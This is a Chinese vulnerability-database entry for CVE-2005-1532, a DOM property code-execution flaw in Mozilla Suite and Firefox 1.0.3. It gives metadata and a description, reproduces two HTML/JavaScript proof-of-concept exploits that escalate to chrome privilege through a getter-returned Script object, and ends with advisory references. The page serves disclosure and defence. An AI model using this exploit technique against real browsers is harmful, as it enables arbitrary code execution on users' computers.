Mozilla Suite和Firefox DOM属性代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108788 漏洞类型 权限许可和访问控制
发布时间 2005-05-16 更新时间 2007-03-02
CVE编号 CVE-2005-1532 CNNVD-ID CNNVD-200505-994
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25670
https://www.securityfocus.com/bid/13645
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-994
|漏洞详情
MozillaSuite和Firefox都是非常流行的开放源码WEB浏览器。MozillaSuite和MozillaFirefox受代码执行漏洞影响。起因是应用程序没有正确的验证文件对象模型(DOM)的属性值。攻击者可以利用这个漏洞以启动有漏洞Web浏览器的权限执行任意代码。该漏洞是MFSA2005-41所述漏洞的变种。
|漏洞EXP
source: http://www.securityfocus.com/bid/13645/info

Mozilla Suite and Mozilla Firefox are affected by a code-execution vulnerability. This issue is due to a failure in the application to properly verify Document Object Model (DOM) property values.

An attacker may leverage this issue to execute arbitrary code with the privileges of the user that activated the vulnerable browser, ultimately facilitating a compromise of the affected computer.

This issue is reportedly a variant of BID 13233. Further details are scheduled to be released in the future; this BID will be updated accordingly.

<html>
<head>
<title>Proof-of-Concept for Firefox 1.0.3 - by moz_bug_r_a4</title> 
<body>
<script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
var scriptCode = "arguments.callee.__parent__.eval('" + evalCode + "');'';";

var script = (function() {
function x() { new Object(); }
return new Script(scriptCode);
})();

document.body.__defineGetter__("type", function() {
return { toString : script };
});

var event = document.createEvent("Events");
event.initEvent("PluginNotFound", true, true);
document.body.dispatchEvent(event);
</script>
</body>

-----------------------------------------------------------------------------------------

<html>
<head>
<title>Proof-of-Concept for Mozilla 1.7.7 - by moz_bug_r_a4</title> 
<body>

<div id="d"></div>
<pre>
Click on the red box.
</pre>

<script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
var scriptCode = "arguments.callee.__parent__.eval('" + evalCode + "');'';";

var script = (function() {
function x() { new Object(); }
return new Script(scriptCode);
})();

var xulns = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul";
var node = document.createElementNS(xulns, "input");

node.__defineGetter__("type", function() {
return { toString : script };
});

node.style.width = "100px";
node.style.height = "100px";
node.style.backgroundColor = "#f00";
document.getElementById("d").appendChild(node);
</script>
</body>
|受影响的产品
Ubuntu Ubuntu Linux 5.0 4 powerpc Ubuntu Ubuntu Linux 5.0 4 i386 Ubuntu Ubuntu Linux 5.0 4 amd64 Ubuntu Ubuntu Linux 4.1 ppc Ubuntu Ubuntu Linux 4.1 ia64 Ubuntu Ubuntu Linux 4
|参考资料

来源:VUPEN
名称:ADV-2005-0530
链接:http://www.frsirt.com/english/advisories/2005/0530
来源:BID
名称:15495
链接:http://www.securityfocus.com/bid/15495
来源:BID
名称:13645
链接:http://www.securityfocus.com/bid/13645
来源:REDHAT
名称:RHSA-2005:601
链接:http://www.redhat.com/support/errata/RHSA-2005-601.html
来源:REDHAT
名称:RHSA-2005:435
链接:http://www.redhat.com/support/errata/RHSA-2005-435.html
来源:REDHAT
名称:RHSA-2005:434
链接:http://www.redhat.com/support/errata/RHSA-2005-434.html
来源:SUSE
名称:SUSE-SA:2006:022
链接:http://www.novell.com/linux/security/advisories/2006_04_25.html
来源:www.mozilla.org
链接:http://www.mozilla.org/security/announce/mfsa2005-44.html
来源:SECTRACK
名称:1013965
链接:http://securitytracker.com/id?1013965
来源:SECTRACK
名称:1013964
链接:http://securitytracker.com/id?1013964
来源:SECUNIA
名称:19823
链接:http://secunia.com/advisories/19823
来源:SCO
名称:SCOSA-2005.49
链接:ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt
来源:USGovernmentResource:oval:org.mitre.oval:def:100014
名称:oval:org.mitre.oval:def:1